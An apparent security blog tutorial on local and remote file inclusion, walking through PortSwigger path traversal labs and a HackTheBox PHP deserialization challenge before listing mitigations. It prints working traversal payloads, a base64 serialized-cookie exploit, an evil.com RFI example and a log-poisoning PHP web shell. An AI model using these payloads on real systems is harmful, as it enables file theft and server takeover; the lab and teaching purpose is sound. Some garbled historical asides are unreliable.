Understanding and Exploiting File Inclusion Vulnerability

mccleod1290

Introduction to File Inclusion Vulnerabilities

File inclusion vulnerabilities create a security risk that freely allows unrestricted access to all files including dangerous assets from external sources. Two corresponding flavors of this web application security attack are :

Local File Inclusion (LFI) and
Remote File Inclusion (RFI).

The weaknesses exploit the same issue through user input vulnerabilities in file-loading operations but they function differently in attacks. Each one of the numerous weaknesses that permeate the cybersecurity domain has multiple names associations. The exploitation methods for these security flaws commonly relate to path traversal even though the security community also uses this term interchangeably with LFI attack techniques.

Local File Inclusion (LFI):

In LFI, attackers move file-path parameters to suck sensitive files directly into the server’s filesystem into the application’s context. Imagine a librarian mindlessly following the uncovered note 'go up four shelves get the locked ledger.' Through the use of path traversal, i.e., through the inclusion of sequences like ../../../../etc/passwd attackers can navigate directory structures in order to access files like /etc/passwd, configuration files or even the source code of your application. Path traversal is the way in which that key, the weak input validation, is used to get access past those “in intended” areas, to get past the boundaries for file access. The damage? Leaked secrets are only the beginning. With exploits like log poisoning—where the bad guys feed Slash, malicious code into server logs and then include them—or abuse of PHP wrapper like php://filter, I an LFI can fairly easily get lifted to full on Code Execution. A classic example? The 2007 Joomla LFI exploit where attackers combined path traversal with weak validation to leak database logs - two years before Brian Krebs.

Remote File Inclusion (RFI):

RFI takes it a step further. Rather than going around town squinting through local shelves, it is more like the librarian retrieving a book from offsite – the sounds and smells that don’t really belong - say, a dodgy website hosting a nasty PHP malware in the back room. By using fully qualified URL (e.g. http://evil.com/malware.php) attackers trick the application to download and execute remote scripts on protocols like HTTP or FTP. The result is typically instant: remote code execution and the server is handed over to the attackers on a silver platter. Due to RFI fame, it exploded into peak in early 2000s with exploits on part of the poorly configured PHP web sites, where allow_url_fopen and allow_url_include were also left unchecked (the whole door was wide opened).

Now we know how this vulnerability works, you might be excited to exploit this in wild. Let’s say there exists an website that has an parameter called https://example.com?filename=cat.png, then you can change file name to get some files remotely from the server. Do note that servers especially in linux are hosted in /var/www/html, which is three directory depth from root directory. If we want to get any sensitive file like flag.txt, or /etc/passwd which acts like common proof of concept for this vulnerability, we are expected to get it relative from /root directory which is three directories from our server configuration.

In that case we can traverse through directories using simple back track command like ../ since we need to move three level upwards, ../../../file would work.

Feel free to solve this portswigger lab and try out for yourself. Simply put, enumerate and find the parameter, and use a simple payload like following to get /etc/passwd

https://0a2000cc04b90fd6802b9ee300ba00e5.web-security-academy.net/image?filename=../../../etc/passwd

But when accessed through website it renders an empty image something like below.

Maybe let’s look through burpsuite, and we do find, /etc/passwd contents in the response.

Although we solved lab, only because we were able to find out the right parameter to fuzz or to inject our payloads. In real websites how to we find parameters to inject something? That’s indeed a valid intriguing question right?

How to find parameters to test for file inclusion vulnerability?

Simply put, this blog will cover four options. Note this these are not pick one option that you find attractive and leave. In real world, we might need to test and try all possible option, and at worst cases one or none might work. But from CTFs and vulnerable machines, we tested and found that the four methods have withstood hard times, and worked in most of the scenarios.

Option 1 : Manual hunting

As cliché as it sounds, clicking every button, submitting every forms, exploring every options, making keen notes on network connection made by the endpoint, and inspecting each functionality with burpsuite and when we find any abnormal or interesting requests or endpoint, (this happens after we gained intuition that comes with experience), we might find some endpoints.

That does not sound fair right? does it mean we have to wait for 3-7 years till we get mastery? No, recon frameworks and asset discovery and attack surface management tools prove they are better. Check out more on github for tools like rengine, osmedeus, reconftw. Alternatively you can read about these automated frameworks for recon and how they are effective in this blog

Option 2: Using ZAP Proxy

This is highly under-rated tool, this tool has an feature called spider and ajax spider, powerful spidering GUI tool, that is accessible with just one right click on the target ! See the below image all you need to do is click on manual explore > pick your domain.com > right click it > select ajax spider or spider and you would have an GUI application that discovers endpoints in web application for you in real time….

Another under-rated feature is active scan. This feature scans for basic attacks, and fortunately for us, single scan solved our lab.

In the bottom left corner, we see alerts and it shows all the findings, we also notice an alert for path traversal.

So if you are not using zap make sure from your next pentest or CTF engagement you use it for finding low hanging fruits, and to discover hidden endpoints.

Option 3: Arjun

This is another popular parameter discovery toolkit which you can download from github. This can be easily installed with pipx, you can google how to install pip and python in your operating system and once done, you can run this tool. Unfortunately we could not find any parameters, that’s fair sometimes things work as expected and other times it does not.

Option 4 : Param-miner extension from burp suite

You can download from burpsuite extensions sectionand make sure you have enabled this extension. Although, we could not find endpoint using this extension, but having a peak at logger in burpsuite revealed an interesting query.

Now this proves the importance for most over-looked section in burpsuite, and it taught us valuable lesson on not to overlook logger section from burpsuite.

Option 5 : Your favourite param-discovery toolkits

You might be considering tools like GAU (get all urls), or waybackurls. While these are valid, in CTFs and sometimes in real world, these tools did not give me much helpful results that the first option (automated frameworks) gave me. So feel free to test all the options before you come to this conclusion, but for me the first fours options have stood and were useful for me from time to time.

Black box testing

For this approach, you can find the valid parameter, and fuzz with wordlists online (spray and pray method), but in long run it’s the least effective ones. When you encounter windows based servers you can use payloads like the following, instead for forward slash, use backward slash.

https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini

Now, since we have understood how to find parameters, now all the sauce is in using and modifying payloads. For this reason we will be quickly going through labs.

Lab 1: File path traversal, traversal sequences blocked with absolute path bypass

**Lab URL: ** https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass

The server in our case, doesn’t validate whether the requested path is relative or absolute. By providing an absolute path like /etc/passwd, the server directly accesses the file from the root directory, bypassing any intended restrictions to a specific folder (e.g., /var/www/images). This works because the server naively trusts the user-supplied path without normalization, or maybe because the server it’self is hosted in /root directory? We can only make close assumptions as we don’t have source code or any idea on how server is configured, but non the less, using an absolute path is one of the valid bypasses when trying for file inclusion attacks !

Payload :

image?filename=/etc/passwd

URL to solve this lab:

https://0abd00f003c4b8d780a68f89005800a7.web-security-academy.net/image?filename=/etc/passwd

Lab 2 : File path traversal, traversal sequences stripped non-recursively

Lab URL : https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively

Sometimes, ../ does not get processed by the server. You can try ....// or ..../\ to bypass the restriction to retrieve files from the server.

Payload:

....//....//....//etc/passwd

URL to solve this lab:

https://0a4f0056045333198529bcfd00140019.web-security-academy.net/image?filename=....//....//....//etc/passwd

Lab 3: File path traversal, traversal sequences stripped with superfluous URL-decode

Lab URL : https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode

Sometimes characters like / don’t get accepted by the webservers, and a simple urlencode either done inside burpsuite or done with cyberchef, would bypass this restriction. Feel free to combine techniques learnt from lab 1 & 2 and perform URL encoding on these payloads.

Payload:

..%252f..%252f..%252fetc/passwd

URL to solve this lab :

https://0a52002e03482067812362170031003e.web-security-academy.net/image?filename=

Lab 4: File path traversal, validation of start of path

Lab URL : https://portswigger.net/web-security/file-path-traversal/lab-validate-start-of-path

Sometimes including the base path in the payload (e.g,/var/www/images/../../../../etc/passwd) tricks the server into appending it, then traversing upward to escape the restricted directory and access sensitive files. Just like how we store websites html code in /var/www/html we can store images in /var/www/images. Also when we manually explore the image location by right-clicking and viewing the image, we get this URL https://0a5700af03e6c4bd8173ed7e009900cb.web-security-academy.net/image?filename=/var/www/images/21.jpg and this suggests we should append an valid start path for payload to work.

Payload:

/var/www/images/../../../etc/passwd

URL to solve this lab:

https://0a5700af03e6c4bd8173ed7e009900cb.web-security-academy.net/image?filename=/var/www/images/../../../etc/passwd

Lab 5 : File path traversal, validation of file extension with null byte bypass

Lab URL : https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass

The server might be configured to check and accept only a valid file extension (e.g., .png). Adding a null byte (%00) after the target file (e.g., ../../../etc/passwd%00.png) truncates the string, removing the enforced extension. This allows traversal while satisfying the extension check superficially.

Payload:

../../../etc/passwd%00.png

Whitebox Testing

Lab URL : https://app.hackthebox.com/challenges/Toxic

Pentesting LFI White Box Series: How a Tiny Cookie Crashed the Party
(Understanding the Toxic Challenge’s Vulnerability)

Source Code analysis

The Toxic challenge has two critical flaws:

Blind Trust in Cookies: The website uses a cookie (PHPSESSID) to decide what to show you. But it doesn’t check if the cookie is safe—it just follows orders.
Dangerous File Inclusion: When the website opens files, it doesn’t verify if you’re allowed to see them. Like leaving your house keys under the doormat.

Where’s the vulnerability hiding?

File: index.php (main page code) and PageModel.php (a helper script).

Let’s translate the code into plain English:

The Autoloader (index.php)

spl_autoload_register(function ($name) {  
    if (preg_match('/Models/', $name)) {  
        $name = "models/${name}";  
    }  
    include_once "${name}.php";  
});

When the website needs a tool (like a class), it checks a toolbox folder (models/) to grab it. The Problem is that it doesn’t lock the toolbox. Hackers can trick it into doing something it was not intended to do.

The Cookie Setup

if (empty($_COOKIE['PHPSESSID'])) {  
    $page = new PageModel;  
    $page->file = '/www/index.html';  
    setcookie('PHPSESSID', base64_encode(serialize($page)), ...);  
}

The website gives you a lunchbox (cookie) with a sandwich (index.html). Now the problemis that you can replace the cookie with anything, including a malicious payload.

The PageModel Class (PageModel.php)

class PageModel {  
    public $file;  
    public function __destruct() {  
        include($this->file);  
    }  
}

This part of code is designed to automatically opens whatever file is stored in $file. The Problem is that If $file is set to something dangerous (like /var/log/secret.log), the website will still open it allowing hackers to exploit local file inclusion vulnerability.

Our main goal is to turn a boring cookie into a remote command center.

Step 1: Create a Poisoned cookie

Tamper with the Cookie: The cookie is a base64-encoded serialized PageModel object. So let’s decode the cookie.

┌─[mccleod1290@parrot]─[~/Desktop]
└──╼ $echo "Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9" | base64 -d
O:9:"PageModel":1:{s:4:"file";s:15:"/www/index.html";}

Change the file property from /www/index.html to /var/log/nginx/access.log (the website’s diary).

┌─[dwbruijn@parrot]─[~/Desktop]
└──╼ $echo 'O:9:"PageModel":1:{s:4:"file";s:25:"/var/log/nginx/access.log";}' | base64
Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZyI7fQo=

Step 2: Write a Secret Message in the Diary

Poison the Logs: Send a request to the website with a malicious User-Agent:

     <?php system($_GET['cmd']); ?>

This writes your PHP code into the log file (like scribbling instructions in the diary).

Step 3: Combine both step 1 & 2

Trigger the Exploit: - Reload the page. The website reads the poisoned log file and executes your code. Your `http request should look something like the following:

Now to get flag you could do the following list of actions:

Add ?cmd=ls+/ to the URL to list files.
Use ?cmd=cat+/flag.txt to steal the flag!

Conclusion

File inclusion vulnerabilities—whether Local (LFI) or Remote (RFI)—are a stark reminder of the dangers of misplaced trust. LFI attacks an application’s own habitat, by path traversal vulnerabilities to access of important files or elevated privileges. Rather, RFI converts the application into a puppets, running malicious code moved from external domains. Both, nonetheless, have one thing in common: blind faith in poorly sanitized user input.

The fallout is severe. A parameter unvalidated can lead to Data leaks, credentials theft, complete system takeover. Attackers move from reading /etc/passwd to their respective home directories to flash webshells, poisoning logs or total takeover of underlying infrastructures.

Mitigation isn’t optional—it’s existential:

Strictly enforce allowlists: Only allow access to specific files, directories or URLs. If it’s not on the list, then it does not exist.
Disable or kill dynamic inclusion: If your app does not need to include files based on user input, then turn on the feature off. Period.
Normalize and sanitize: back to absolute form for paths, remove traversal sequences (../), and ban on evil chars (e. g. %00, ://)
Sandbox file operations: Execute inclusion operations as a limited user in order to keep them away from vital system resources.
Defenses in layers : Mix input validation with Web Application Firewalls (WAF), Runtime monitoring of anomalies.

Understanding LFI and RFI is not transactional, it’s transformative, it’s not patching code, it’s renewing trust. Each inclusion point is an entry point for attackers. Hardening these vectors are you not just fixing a bug you are taking out an entire class of exploits. Complacency is the enemy in cybersecurity, stay curious, and stay hungry, see you on the next blog.